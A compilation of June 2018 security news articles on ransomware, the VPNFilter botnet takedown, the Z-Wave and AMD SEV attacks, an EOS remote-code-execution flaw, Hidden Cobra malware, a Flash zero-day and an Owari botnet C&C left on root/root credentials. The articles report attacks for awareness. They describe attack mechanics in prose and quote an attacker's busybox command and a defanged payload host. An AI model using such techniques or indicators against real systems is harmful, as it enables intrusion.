Data Classification Firm DocAuthority Raises $10 Million
7.6.2018 securityweek IT

Israeli startup firm DocAuthority has raised $10 million in a Series A funding round led by Raine Ventures, with the participation of Greycroft, ffVC, Differential VC in the US, and 2B Angels and Plus Ventures in Israel. The finance will be used to accelerate growth and market reach.

DocAuthority brings artificial intelligence to the classification problem for unstructured data. Security and compliance require that company secrets, intellectual property and personal information be adequately secured; but business efficiency requires ready access to and use of non-confidential data. This requires accurate document classification, specifying what level of security control should be applied to different documents.

This data classification is traditionally performed manually. If applied historically it can take many months, and is subject to both false positives and false negatives in the application of classification labels. If done in real time, there is a frequent tendency for individuals to over-classify -- to assume a particular document is more sensitive than it actually is.

The result is often both an unnecessary burden on staff efficiency (through over-classification), and a failure to adequately protect instances of personal data (through under-classification). The need to locate and protect all instances of PII is increasingly important with the rapid growth of severe personal privacy legislation, such as GDPR.

DocAuthority's AI-based platform will scan documents and apply classification without human error, and at machine rather than human speed. "DocAuthority's revolutionary BusinessID technology," claims cofounder and CTO Ariel Peled, "is a new branch in data science, offering a novel take on AI that solves a major problem in data management and protection. With full automation and an accuracy level of 1:10,000, both business and security can agree and safely rely on policies for data classification, access management, DLP, encryption and as importantly, retention."

The funding "is an important milestone for DocAuthority," commented CEO Steve Abbott. "DocAuthority enables organizations to manage data based on both risk profile and business value, offering a common language across an organization. Assigning data management policies, based on business category, easily aligns security controls with business usage of data."

DocAuthority was founded in 2013 by Ariel Peled (CTO) and Itay Reved (VP R&D). It is based in Ra'anana, HaMerkaz, in central Israel.


'RedEye' Ransomware Destroys Files, Rewrites MBR
7.6.2018 securityweek
Ransomware

A newly discovered piece of ransomware appears mainly created to destroy the victim’s files instead of encrypting and holding them for ransom.

Dubbed RedEye, the malware appears to be the creation of the developer behind the Annabelle ransomware, who also claims to have made the JigSaw ransomware that first emerged a couple of years back (Cisco says the individual might be responsible for several other families as well).

The same as Anabelle and JigSaw, RedEye’s destructive nature makes it stand out in the crowd. While the vast majority of ransomware families out there have been created with the purpose of generating revenue for their authors and operators, RedEye would gladly destroy users’ files even if there’s no financial gain in it.

The new threat, Bart Blaze discovered, has a large file size, at 35.0 MB. This is the result of several media files (images and audio files) being embedded in the binary. Among these, there are three .wav files (child.wav, redeye.wav, and suicide.wav) meant to play a creepy sound, intended to scare the victim.

The malware author also used ConfuserEx and compression, along with a few other tricks, to protect the binary. A second binary was also embedded in the file, capable of replacing the MBR (Master Boot Record).

Once it has infected a computer, the ransomware performs a series of actions to make removal a difficult process. The threat disables task manager and also hides the victim machine’s drives.

RedEye then displays a ransom note informing victims that their files have been encrypted using AES256 and that they should access an .onion website and pay 0.1 Bitcoins to a specified address. This would supposedly result in a decryption key being delivered to them.

The victim is required to pay the ransom in 4 days, and the malware claims to be able to “fully destroy” the computer after that period of time is over.

Options available in the ransomware include the possibility to view encrypted files and decrypt them, get support, and “destroy PC.”

If the last option is selected, a GIF is displayed in the background, with an option to proceed with the operation (a "Do it" button) and another to close the image. If “Do it” is selected, the same as when the 4-day window is over, the malware reboots the machine and replaces the MBR.

Thus, when the victim powers on the system, they are greeted with a message informing them that “RedEye terminated their computer.” The malware author signed the message with the “iCoreX” handle.

Blaze also notes that, despite claiming to have securely encrypted files with AES256, RedEye appears to actually “overwrite or fill files with 0 bytes,” thus rendering them useless. The malware also appends the .RedEye extension to the affected files.

“While it appears that the RedEye ransomware has even more tricks up its sleeve than its predecessor Annabelle, the same conclusion holds true: do not pay the ransomware. As for the actual purpose of the ransomware: it may be considered a ransomware of the wiper kind, however, it appears the author likes to showcase his or her skill,” Blaze concludes.


FBI seizes control of a massive botnet that infected over 500,000 routers
7.6.2018 thehackernews  BotNet

Shortly after Cisco's released its early report on a large-scale hacking campaign that infected over half a million routers and network storage devices worldwide, the United States government announced the takedown of a key internet domain used for the attack.
Yesterday we reported about a piece of highly sophisticated IoT botnet malware that infected over 500,000 devices in 54 countries and likely been designed by Russia-baked state-sponsored group in a possible effort to cause havoc in Ukraine, according to an early report published by Cisco's Talos cyber intelligence unit on Wednesday.
Dubbed VPNFilter by the Talos researchers, the malware is a multi-stage, modular platform that targets small and home offices (SOHO) routers and storage devices from Linksys, MikroTik, NETGEAR, and TP-Link, as well as network-access storage (NAS) devices.


Meanwhile, the court documents unsealed in Pittsburgh on the same day indicate that the FBI has seized a key web domain communicating with a massive global botnet of hundreds of thousands of infected SOHO routers and other NAS devices.
The court documents said the hacking group behind the massive malware campaign is Fancy Bear, a Russian government-aligned hacking group also known as APT28, Sofacy, X-agent, Sednit, Sandworm, and Pawn Storm.
The hacking group has been in operation since at least 2007 and has been credited with a long list of attacks over the past years, including the 2016 hack of the Democratic National Committee (DNC) and Clinton Campaign to influence the U.S. presidential election.
"This operation is the first step in the disruption of a botnet that provides the Sofacy actors with an array of capabilities that could be used for a variety of malicious purposes, including intelligence gathering, theft of valuable information, destructive or disruptive attacks, and the misattribution of such activities," John Demers, the Assistant Attorney General for National Security, said in a statement.
Among other, Talos researchers also found evidence that the VPNFilter source code share code with versions of BlackEnergy—the malware responsible for multiple large-scale attacks targeting devices in Ukraine that the U.S. government has attributed to Russia.
VPNFilter has been designed in a way that it could be used to secretly conduct surveillance on its targets and gather intelligence, interfere with internet communications, monitor industrial control or SCADA systems, such as those used in electric grids, other infrastructure and factories, as well as conduct destructive cyber attack operations.


The seizure of the domain that is part of VPNFilter's command-and-control infrastructure allows the FBI to redirect attempts by stage one of the malware (in an attempt to reinfect the device) to an FBI-controlled server, which will capture the IP address of infected devices and pass on to authorities around the globe who can remove the malware.
Users of SOHO and NAS devices that are infected with VPNFilter are advised to reboot their devices as soon as possible, which eliminates the non-persistent second stage malware, causing the persistent first-stage malware on their infected device to call out for instructions.
"Although devices will remain vulnerable to reinfection with the second stage malware while connected to the Internet, these efforts maximize opportunities to identify and remediate the infection worldwide in the time available before Sofacy actors learn of the vulnerability in their command-and-control infrastructure," the DoJ said.
Since VPNFilter does not exploit any zero-day vulnerability to infect its victims and instead searches for devices still exposed to known vulnerabilities or having default credentials, users are strongly recommended to change default credentials for their devices to prevent against the malware.
Moreover, always put your routers behind a firewall, and turn off remote administration until and unless you really need it.
If your router is by default vulnerable and can't be updated, it is time you buy a new one. You need to be more vigilant about the security of your smart IoT devices.


Here's How to Download All the Data Apple Collects About You
7.6.2018 thehackernews Apple

Apple is making it easier for its users to download their data the company has collected about them so far.
On Wednesday, Apple just launched a new Data and Privacy website that allows you to download everything that the company knows about you, from Apple ID info, device info, App Store activity, AppleCare history, your online shopping habits to all of your data stored in its iCloud.
A similar feature was recently offered by Facebook, enabling its users to download all of their data, not only what they have posted, but also information like facial recognition and location data, following the Cambridge Analytica scandal.
Apple has currently made this feature only available for people having accounts in European Union (along with Iceland, Liechtenstein, Norway and Switzerland), to comply with the General Data Protection Regulation (GDPR) act, which goes into effect on May 25.


However, Apple is planning to roll out this feature worldwide in the coming months. "We intend to provide these capabilities to customers around the world in the coming months," the company wrote.
The new GDPR act was passed with an aim to completely transform the way companies handle its users' personal data, giving users more control over their data. The act applies to all companies that collect the data of EU people, regardless of where they are based.
The GDPR will replace the British Data Protection Act 1998 from 25 May 2018.
The government has also warned businesses that if they fail to make changes in their policies before Friday, they could face fines of up to £17 Million (more than $22 Million), or 4% of their global turnover—whichever amount is higher.
That's why big companies like Apple have decided to inform their European customers about the new privacy policies.
Here's How to Download Your Data:
You can download all your data with a few simple clicks on the privacy portal.
Log in to privacy.apple.com on your Mac, PC, or iPad.
Select the Get started link under the "Obtain a copy of your data" heading in Manage your data.
You can press 'Select All' to download everything or tick the boxes of the data categories you want to download. iCloud data are provided into a separate list as this data may be large and can take a long time to download.
Apple splits up the data into chunks, which ranges from 1 GB up to a maximum of 25 GB, letting you select your preferred maximum file size. Select a size and hit 'Continue.'
Your download is now in progress, and Apple will send you an email when the files are available to download, which can take up to a week. Your downloaded data is then automatically deleted after 2 weeks.


Here's the List of Data that You can Download:
App Store, iTunes Store, iBooks Store and Apple Music activity
Apple ID account and device information
Apple Online Store and Retail Store activity
AppleCare support history, repair requests and more
Game Center activity
iCloud Bookmarks and Reading List
iCloud Calendars and Reminders
iCloud Contacts
iCloud Notes
Maps Report an Issue
Marketing subscriptions, downloads, and other activity
Other data
iCloud Drive files and documents
iCloud Mail
iCloud Photos
Besides data download feature, Apple is also providing an option of permanently deleting all of your data, which has been made available globally starting today. Once you initiate the data delete option, the company can take up to 7 days to approve the request.
But keep in mind: Once deleted, there is no way you can retrieve your data.


Pornhub launches VPNhub – a free and unlimited VPN service
7.6.2018 thehackernews  Safety

PornHub wants you to keep your porn viewing activities private, and it is ready to help you out with its all-new VPN service.
Yes, you heard that right.
Adult entertainment giant PornHub has launched its very own VPN service today with "free and unlimited bandwidth" to help you keep prying eyes away from your browsing activity.


Dubbed VPNhub, the VPN service by PornHub is available for both mobile as well as desktop platform, including Android, iOS, MacOS, and Windows.
VPN, or Virtual Private Network, allows users to transmit data anonymously, avoids ISP-level website blocking or tracking and keeps your browsing activity private by encrypting your data, even when you are on public Wi-Fi connections.

VPNhub promises never to store, collect, sell, or share your personal information with any third parties for their marketing, advertising or research purposes.


However, in its privacy policy under the heading, "How We Use Your Information," the company says it can sell "aggregate or non-personally identifiable information with non-affiliated third parties for advertising, marketing or research purposes."
Since some government, including that of United Kingdom, are regulating adult content online, launching a VPN service by Pornhub makes sense.

VPNhub is available in countries across the globe except for Burma/Myanmar, Cuba, Iran, North Korea, Sudan, and Syria, due to the ban imposed by the U.S. government.
While mobile users (both iOS and Android) can download and use the VPNhub app for free, desktop users (MacOS and Windows) have to purchase a premium account.
You can also upgrade your free account to a premium subscription for $13 a month or $90 for a full year, which eliminates ads, provides faster connection speeds, and opens up "servers from a wide range of countries."
You can give premium VPNhub a try by using its use 7-day free trial.


Z-Wave Downgrade Attack Left Over 100 Million IoT Devices Open to Hackers
7.6.2018 thehackernews  IoT

Researchers have found that even after having an advanced encryption scheme in place, more than 100 million Internet-of-Things (IoT) devices from thousands of vendors are vulnerable to a downgrade attack that could allow attackers to gain unauthorized access to your devices.
The issue resides in the implementation of Z-Wave protocol—a wireless, radio frequency (RF) based communications technology that is primarily being used by home automation devices to communicate with each other.
Z-Wave protocol has been designed to offer an easy process to set up pairing and remotely control appliances—such as lighting control, security systems, thermostats, windows, locks, swimming pools and garage door openers—over a distance of up to 100 meters (330 feet).


The latest security standard for Z-Wave, called S2 security framework, uses an advanced key exchange mechanism, i.e., Elliptic-Curve Diffie-Hellman (ECDH) anonymous key agreement protocol, to share unique network keys between the controller and the client device during the pairing process.
Even after Silicon Labs, the company who owns Z-Wave, made it mandatory for certified IoT devices to use the latest S2 security standard, millions of smart devices still support the older insecure version of pairing process, called S0 framework, for compatibility.
S0 standard was found vulnerable to a critical vulnerability in 2013 due to its use of a hardcoded encryption key (i.e. 0000000000000000) to protect the network key, allowing attackers in range of the targeted devices to intercept the communication.

After analyzing Z-Wave, security researchers from UK-based Pen Test Partners discovered that devices which support both versions of key-sharing mechanisms could be forced to downgrade the pairing process from S2 to S0.
Dubbed Z-Shave by the researchers, the downgrade attack makes it easier for an attacker in range during the pairing process to intercept the key exchange, and obtain the network key to command the device remotely.


Researchers found the vulnerability while comparing the process of key exchange using S0 and S2, wherein they noticed that the node info command which contains the security class is being transferred entirely unencrypted and unauthenticated, allowing attackers to intercept or broadcast spoofed node command without setting the security class.

The researchers—Ken Munro and Andrew Tierney—used the Conexis L1 Smart Door Lock, a flagship product of British company Yale that ships for $360, for their exploit, and were able to downgrade its security, and eventually steal the keys and get permanent access to the Yale lock, and therefore the building protected by it, all without the actual user's knowledge.
You can also watch the video of the Z-Shave attack, wherein the researchers demonstrated how an attacker could unlock a door.

The S0 decryption attack was initially revealed by cybersecurity consulting company SensePost back in 2013, but at that time, Silicon Labs didn't see this issue "as a serious threat in the real world" because it was limited to the timeframe of the pairing process.
Silicon Labs published a blog post in response to the Pen Test Partners' findings on Wednesday, saying the company is confident its smart devices are secure and not vulnerable to such threats.
"S2 is the best-in-class standard for security in the smart home today, with no known vulnerabilities, and mandatory for all new Z-Wave products submitted for certification after April 2, 2017," reads the blog post.
However, the company said that since the adoption of S2 framework across the ecosystem could not happen overnight, the issue existed in Z-Wave for providing backward compatibility, so that S2 devices can work in an S0 network (and vice versa).
The company also said there are procedures in place to notify and alert users in times when secure devices connect to networks using downgraded communications, but IoT device manufacturers hardly provide any user interface to show such alerts, leaving users unaware of this attack.


Researchers Defeat AMD's SEV Virtual Machine Encryption
7.6.2018 thehackernews  Safety

German security researchers claim to have found a new practical attack against virtual machines (VMs) protected using AMD's Secure Encrypted Virtualization (SEV) technology that could allow attackers to recover plaintext memory data from guest VMs.
AMD's Secure Encrypted Virtualization (SEV) technology, which comes with EPYC line of processors, is a hardware feature that encrypts the memory of each VM in a way that only the guest itself can access the data, protecting it from other VMs/containers and even from an untrusted hypervisor.


Discovered by researchers from the Fraunhofer Institute for Applied and Integrated Security in Munich, the page-fault side channel attack, dubbed SEVered, takes advantage of lack in the integrity protection of the page-wise encryption of the main memory, allowing a malicious hypervisor to extract the full content of the main memory in plaintext from SEV-encrypted VMs.
Here's the outline of the SEVered attack, as briefed in the paper:
"While the VM’s Guest Virtual Address (GVA) to Guest Physical Address (GPA) translation is controlled by the VM itself and opaque to the HV, the HV remains responsible for the Second Level Address Translation (SLAT), meaning that it maintains the VM’s GPA to Host Physical Address (HPA) mapping in main memory.
"This enables us to change the memory layout of the VM in the HV. We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside."
"We first identify the encrypted pages in memory corresponding to the resource, which the service returns as a response to a specific request. By repeatedly sending requests for the same resource to the service while re-mapping the identified memory pages, we extract all the VM's memory in plaintext."
During their tests, the team was able to extract a test server's entire 2GB memory data, which also included data from another guest VM.
In their experimental setup, the researchers used a with the Linux-based system powered by an AMD Epyc 7251 processor with SEV enabled, running web services—the Apache and Nginx web servers—as well as an SSH server, OpenSSH web server in separate VMs.


As malicious HV, the researchers used the system's Kernel-based Virtual Machine (KVM) and modified it to observe when software within a guest accessed physical RAM.
While Apache and Nginx web servers the extraction of memory data was high (at a speed of 79.4 KB/sec), OpenSSH had a higher response time which reduced the extraction speed to only 41.6 KB/sec.
"Our evaluation shows that SEVered is feasible in practice and that it can be used to extract the entire memory from an SEV-protected VM within a reasonable time," the researchers said. "The results specifically show that critical aspects, such as noise during the identification and the resource stickiness are managed well by SEVered."
The researchers also recommended a few steps AMD could take to isolate the transition process between the host and Guest Physical Address (GPA) to mitigate the SEVered attack.
The best solution is to provide "a full-featured integrity and freshness protection of guest-pages additional to the encryption, as realized in Intel SGX. However, this likely comes with a high silicon cost to protect full VMs compared to SGX enclaves."
However, securely combine the hash of the page’s content with the guest-assigned GPA could be a low-cost, efficient solution, which ensures "pages cannot easily be swapped by changing the GPA to HPA mapping."
The research was carried out by four Fraunhofer AISEC researchers—Mathias Morbitzer, Manuel Huber, Julian Horsch and Sascha Wessel—which has been published in their paper [PDF] titled, "SEVered: Subverting AMD’s Virtual Machine Encryption."


Critical RCE Flaw Discovered in Blockchain-Based EOS Smart Contract System
7.6.2018 thehackernews 
Vulnerebility

Security researchers have discovered a series of new vulnerabilities in EOS blockchain platform, one of which could allow remote hackers to take complete control over the node servers running the critical blockchain-based applications.
EOS is an open source smart contract platform, known as 'Blockchain 3.0,' that allows developers to build decentralized applications over blockchain infrastructure, just like Ethereum.
Discovered by Chinese security researchers at Qihoo 360—Yuki Chen of Vulcan team and Zhiniang Peng of Core security team—the vulnerability is a buffer out-of-bounds write issue which resides in the function used by nodes server to parse contracts.


To achieve remote code execution on a targeted node, all an attacker needs to do is upload a maliciously crafted WASM file (a smart contract) written in WebAssembly to the server.

As soon as the vulnerable process parser reads the WASM file, the malicious payload gets executed on the node, which could then also be used to take control over the supernode in EOS network—servers that collect transaction information and pack it into blocks.
"With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance," the duo explained in their blog post published today.
"And with the help of our malicious WASM code, we finally achieve arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS. Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker."
Once the attackers gained control over the supernode, they could eventually "pack the malicious contract into the new block and further control all nodes of the EOS network."


Since the super node system can be controlled, the researchers said the attackers can "do whatever they want," including, controlling the virtual currency transactions, and acquiring other financial and privacy data in the EOS network participating node systems, such as an exchange Digital currency, the user's key stored in the wallet, key user profiles, privacy data, and much more.
"What's more, the attacker can turn a node in the EOS network into a member of a botnet, launch a cyber attack or become a free 'miner' and dig up other digital currencies," the researchers told THN.
Researchers have detailed how to reproduce the vulnerability and also released a proof-of-concept exploit, along with a video demonstration, which you can watch on their blog post.
The exploit demonstrated by the 360Vulcan researcher can bypass multiple default security mitigation measures to achieve complete control over the super node running the malicious contract.
The pair responsibly reported the vulnerability to the maintainers of the EOS project, and they have already released a fix for the issue on GitHub.
"In Blockchain networks and digital currency systems, there are many attack surfaces existing in nodes, digital wallets, mining pools and smart contracts. 360 ​​security team has previously discovered and disclosed multiple relevant high risk vulnerabilities,"
The researchers believe the new type of vulnerabilities affect not only EOS alone but also other types of Blockchain platforms and virtual currency applications.


Yahoo Hacker linked to Russian Intelligence Gets 5 Years in U.S. Prison
7.6.2018 thehackernews  Crime

A 23-year-old Canadian man, who pleaded guilty last year for his role in helping Russian government spies hack into email accounts of Yahoo users and other services, has been sentenced to five years in prison.
Karim Baratov (a.k.a Karim Taloverov, a.k.a Karim Akehmet Tokbergenov), a Kazakhstan-born Canadian citizen, was also ordered on Tuesday by United States Judge Vince Chhabria to pay a fine of $250,000.
Baratov had previously admitted his role in the 2014 Yahoo data breach that compromised about 500 million Yahoo user accounts. His role was to "hack webmail accounts of individuals of interest to the FSB," Russia's spy agency.
In November, Baratov pleaded guilty to a total of nine counts, including one count of conspiring to violate the Computer Fraud and Abuse Act, and eight counts of aggravated identity theft.
According to the US Justice Department, Baratov and his co-defendant hacker Alexsey Belan worked for two agents—Dmitry Dokuchaev and Igor Sushchin—from the FSB (Federal Security Service) to compromise the accounts.
The Justice Department announced charges for all of the four people in March last year, which resulted in the arrest of Baratov in Toronto at his Ancaster home and then his extradition to the United States.
However, Belan—who is already on the FBI's Most Wanted Hackers list—and both FSB officers currently reside in Russia, due to which they are unlikely to face the consequences for their involvement.
Baratov ran an illegal no-questions-asked hacking service from 2010 until his arrest in March 2017, wherein he charged customers around $100 to obtain another person's webmail password by tricking them to enter their credentials into a fake password reset page.
According to the court documents, Baratov managed to crack more than 11,000 email accounts in both Russia as well as the United States before the Toronto Police Department caught him.
As part of his plea, Baratov admitted to hacking thousands of webmail accounts of individuals for seven years and send those accounts' passwords to Russian spy Dokuchaev in exchange for money.
The targeted attack allowed the four to gain direct access to Yahoo's internal networks, and once in, co-defendant hacker Belan started poking around the network.
According to the FBI, Belan discovered two key assets:
Yahoo's User Database (UDB) – a database containing personal information about all Yahoo users.
The Account Management Tool – an administrative tool used to make alterations to the targeted accounts, including their passwords.
Belan then used the file transfer protocol (FTP) to download the Yahoo's UDB, which included password recovery emails and cryptographic values unique to each Yahoo account, eventually enabling Belan and Baratov to access specific accounts of interest to the Russian spies.
According to Baratov's lawyers, at the time of the crime, Baratov had no idea he was working with Russian FSB agents.


Russia asks Apple to remove Telegram Messenger from the App Store
7.6.2018 thehackernews  BigBrothers

Russia's communications regulator Roskomnadzor has threatened Apple to face the consequences if the company does not remove secure messaging app Telegram from its App Store.
Back in April, the Russian government banned Telegram in the country for the company's refusal to hand over private encryption keys to Russian state security services to access messages sent using the secure service.
However, so far, the Telegram app is still available in the Russian version of Apple's App Store.
So in an effort to entirely ban Telegram, state watchdog Roskomnadzor reportedly sent a legally binding letter to Apple asking it to remove the app from its Russian App Store and block it from sending push notifications to local users who have already downloaded the app.
Roskomnadzor's director Alexander Zharov said he is giving the company one month to remove the Telegram app from its App Store before the regulator enforces punishment for violations.
For those unfamiliar with the app, Telegram offers end-to-end encryption for secure messaging, so that no one, not even Telegram, can access the messages that are sent between users.
However, despite being banned in April, the majority of users in Russia are still using the app via Virtual Private Networks (VPNs), and only 15 to 30 percent of Telegram's operations in the country have been disrupted so far, Roskomnadzor announced yesterday.
This failure leads the regulator to turn to Apple for help taking the app down.
"In order to avoid possible action by Roskomnadzor for violations of the functioning of the above-mentioned Apple Inc. service, we ask you to inform us as soon as possible about your company’s further actions to resolve the problematic issue," said Roskomnadzor in the letter.
The state regulator also says that the regulator is in talks with Google to ban the Telegram app from Google Play as well.
Roskomnadzor is a federal executive body in Russia which is responsible for overseeing the media, including the electronic media, mass communications, information technology and telecommunications; organizing the work of the radio-frequency service; and overseeing compliance with the law protecting the confidentiality of its users' personal data.
Roskomnadzor wanted Telegram to share its users' chats and encryption keys with the state security services, as the encrypted messaging app is widely popular among terrorists that operate inside Russia.
However, Telegram declined to comply with the requirements.
Apple has primarily expressed its support for encryption and secure data in the past, but we have seen the company complying with the local demands.
Last year, Apple removed all VPN apps from its App Store in China, making it harder for internet users to bypass its Great Firewall, and moved its iCloud operations to a local firm linked to the Chinese government.
Also, at the end of last year, Apple pulled Skype, along with several similar apps, from its App Store in China.


FBI issues alert over two new malware linked to Hidden Cobra hackers
7.6.2018 thehackernews 
Virus

The US-CERT has released a joint technical alert from the DHS and the FBI, warning about two newly identified malware being used by the prolific North Korean APT hacking group known as Hidden Cobra.
Hidden Cobra, often known as Lazarus Group and Guardians of Peace, is believed to be backed by the North Korean government and known to launch attacks against media organizations, aerospace, financial and critical infrastructure sectors across the world.
The group was even associated with the WannaCry ransomware menace that last year shut down hospitals and businesses worldwide. It is reportedly also linked to the 2014 Sony Pictures hack, as well as the SWIFT Banking attack in 2016.
Now, the Department of Homeland Security (DHS) and the FBI have uncovered two new pieces of malware that Hidden Cobra has been using since at least 2009 to target companies working in the media, aerospace, financial, and critical infrastructure sectors across the world.
The malware Hidden Cobra is using are—Remote Access Trojan (RAT) known as Joanap and Server Message Block (SMB) worm called Brambul. Let's get into the details of both the malware one by one.
Joanap—A Remote Access Trojan
According to the US-CERT alert, "fully functional RAT" Joanap is a two-stage malware that establishes peer-to-peer communications and manages botnets designed to enable other malicious operations.
The malware typically infects a system as a file delivered by other malware, which users unknowingly download either when they visit websites compromised by the Hidden Cobra actors, or when they open malicious email attachments.
Joanap receives commands from a remote command and control server controlled by the Hidden Cobra actors, giving them the ability to steal data, install and run more malware, and initialize proxy communications on a compromised Windows device.
Other functionalities of Joanap include file management, process management, creation and deletion of directories, botnet management, and node management.
During analysis of the Joanap infrastructure, the U.S. government has found the malware on 87 compromised network nodes in 17 countries including Brazil, China, Spain, Taiwan, Sweden, India, and Iran.
Brambul—An SMB Worm
Brambul is a brute-force authentication worm that like the devastating WannaCry ransomware, abuses the Server Message Block (SMB) protocol in order to spread itself to other systems.
The malicious Windows 32-bit SMB worm functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims' networks by dropper malware.
"When executed, the malware attempts to establish contact with victim systems and IP addresses on victims' local subnets," the alert notes.
"If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks."
Once Brambul gains unauthorized access to the infected system, the malware communicates information about victim's systems to the Hidden Cobra hackers using email. The information includes the IP address and hostname—as well as the username and password—of each victim's system.
The hackers can then use this stolen information to remotely access the compromised system via the SMB protocol. The actors can even generate and execute what analysts call a "suicide script."
DHS and FBI have also provided downloadable lists of IP addresses with which the Hidden Cobra malware communicates and other IOCs, to help you block them and enable network defenses to reduce exposure to any malicious cyber activity by the North Korean government.
DHS also recommended users and administrators to use best practices as preventive measures to protect their computer networks, like keeping their software and system up to date, running Antivirus software, turning off SMB, forbidding unknown executables and software applications.
Last year, the DHS and the FBI published an alert describing Hidden Cobra malware, called Delta Charlie—a DDoS tool which they believed North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets.
Other malware linked to Hidden Cobra in the past include Destover, Wild Positron or Duuzer, and Hangman with sophisticated capabilities, like DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware.


Adobe fixed the CVE-2018-5002 Flash Zero-Day exploited in targeted attacks in the Middle East

7.6.2018 securityaffairs Exploit

Adobe has recently fixed several vulnerabilities, including the CVE-2018-5002 Flash Zero-Day exploited in targeted attacks in the Middle East
Adobe has released security updates for Flash Player that address four vulnerabilities, including a critical issue (CVE-2018-5002) that has been exploited in targeted attacks mainly aimed at entities in the Middle East.

The CVE-2018-5002 vulnerability, reported by researchers at ICEBRG and Qihoo 360 and Tencent, is a stack-based buffer overflow that can be exploited by attackers arbitrary code execution.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 29.0.0.171 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

“Adobe is aware of a report that an exploit for CVE-2018-5002 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash Player content distributed via email.”

The researcher did not disclose technical details of the vulnerability, but Adobe confirmed that the zero-day was exploited in targeted attacks against Windows users.

Attackers launched spear phishing attacks using messages with weaponized Office documents (Excel spreadsheet named “salary.xlsx) that contain specially crafted Flash content.

“The hackers carefully constructed an Office document that remotely loaded Flash vulnerability. When the document was opened, all the exploit code and malicious payload were delivered through remote servers. This attack mainly targets the Middle East.” reads the analysis published by Qihoo 360.

CVE-2018-5002 zero-day Adobe Flash player

The Flash Player 30.0.0.113 version also addresses the following vulnerabilities:

CVE-2018-4945 – a critical type confusion vulnerability that can lead to code execution, it was reported by researchers at Tencent.
CVE-2018-5000 – an “important” severity integer overflow that can lead to information disclosure, it was reported anonymously through Trend Micro’s Zero Day Initiative (ZDI).
CVE-2018-5001 – an “important” out-of-bounds read flaw that can lead to information disclosure, it was reported anonymously through Trend Micro’s Zero Day Initiative (ZDI).
This is the second zero-day discovered in 2018, the first Adobe zero-day, tracked as CVE-2018-4878, was patched in February after it was exploited by North Korea-linked nation-state hackers in attacks aimed at South Korea. The flaw was later exploited by different cybercrime gangs.

According to the analysis published by Qihoo 360, attackers were preparing the campaign recently detected at least since February. The C&C domain appears as a job search website in the Middle East and its name leads the experts into believing that the target is located in Doha, Qatar.

“Through analysis, we can see that the attack used a 0-day vulnerability regardless of the cost. The attacker developed sophisticated plans in the cloud and spent at least three months preparing for the attack. The detailed phishing attack content was also tailored to the attack target. All clues show this is a typical APT attack. We suggest all relevant organizations and users to update their Flash to the latest versions in a timely manner. ” concludes Qihoo 360.


It’s not a joke, Owari botnet operators used root as username and password to access a C&C
7.6.2018 securityaffairs BotNet

Security expert Ankit Anubhav discovered a Command and Control server for the Owari botnet protected with weak credentials.
An IoT botnet has been commandeered by white hats after its controllers used a weak username and password combination for its command-and-control server.

Security expert Ankit Anubhav from Newsky Security discovered an IoT botnet that was controlled by an architecture poorly configured, the botmaster used weak credentials for the authentication to the command-and-control server.

The researchers exploited week configuration to take over the MySQL server used to control the Owari botnet, the author left port 3306 open allowing the authentication with “root” as username and password.

“We observed few IPs attacking our honeypots with default credentials, with executing commands like /bin/busybox OWARI post successful login. In one of the cases, a payload hosted on 80(.)211(.)232(.)43 was attempted to be run post download.

When we investigated the IP, we observed that port 3306, the default port for MySQL database, was open.” reads the blog post published by Ankit Anubhav.

“We tried to investigate more into this IP. To our surprise, it is connected to the attacker’s servers using one of the weakest credentials known to mankind.

Username: root
Password: root“

The situation is paradoxical considering that Mirai-based botnets, including Owari, spread through Internet-of-Things devices by brute-force guessing passwords and taking advantage of default credentials.

Database investigation conducted by the experts allowed the expert to discover a User table that contains login credentials for various users who will control the botnet. Some entries could be associated with botmasters or customers of the botnet

“User table contains login credentials for various users who will control the botnet. Some of them can be botnet creators, or some can simply be the customers of the botnet, a.k.a black box users, who pay a sum of money to launch DDoS attacks. Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the bot master is available) and cooldown time (time interval between the two attack commands) can also be observed.” continues the expert.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1(maximum). It is to be noted that the credentials of all these botnet users are also weak.”

The expert also discovered a history table containing information on the DDoS attacks carried out against various targets. Some of the IP addresses targeted by the botnet were associated with rival IoT botnets.

Anubhav also investigated the revenue model behind the Owari botnet, he was able to reach a known Owari operator that goes online as “Scarface” that provided the following comment:

“For 60$ / month, I usually offer around 600 seconds of boot time, which is low compared to what other people offer. However, it is the only way I can guarantee a stable bot count.” explained Scarface.

“I can’t allow having 10+ people doing concurrent attacks of 1800 seconds each. Usually there is no cooldown on my spots. If I decide to give the cooldown, it’s about 60 seconds or less. 60$/month is not much but when you get 10–15 costumers per month it is enough to cover most of my virtual expenses”

Is this the end for the Owari botnet?

Of course no, even if the expert has taken over the MySQL database, botnet operators continuously change attack IPs to remain under the radar even when the malicious traffic associated to some of their IPs is detected.

The IPs reported in the analysis of the expert are already offline.


Are Wi-Fi hotspots in World Cup Russia host cities secure?

7.6.2018 securityaffairs CyberCrime

Experts at Kaspersky Lab have evaluated the security of 32,000 public Wi-Fi hotspots in the 11 Russian cities hosting the World Cup.
The upcoming soccer World Cup represents a privileged target for crooks, hackers, and nation-state actors. It is essential for organizations to take care of any aspect related to the event to protect participants, including travelers using WiFi networks in the host cities.

Experts at Kaspersky Lab have evaluated the security of 32,000 public Wi-Fi hotspots in the 11 Russian cities hosting the World Cup. We have explained several times, the risks associated with the usage of open WiFi networks, threat actors could monitor traffic to steal sensitive data and launch MITM attacks against the victims to conduct a broad range of malicious activities.

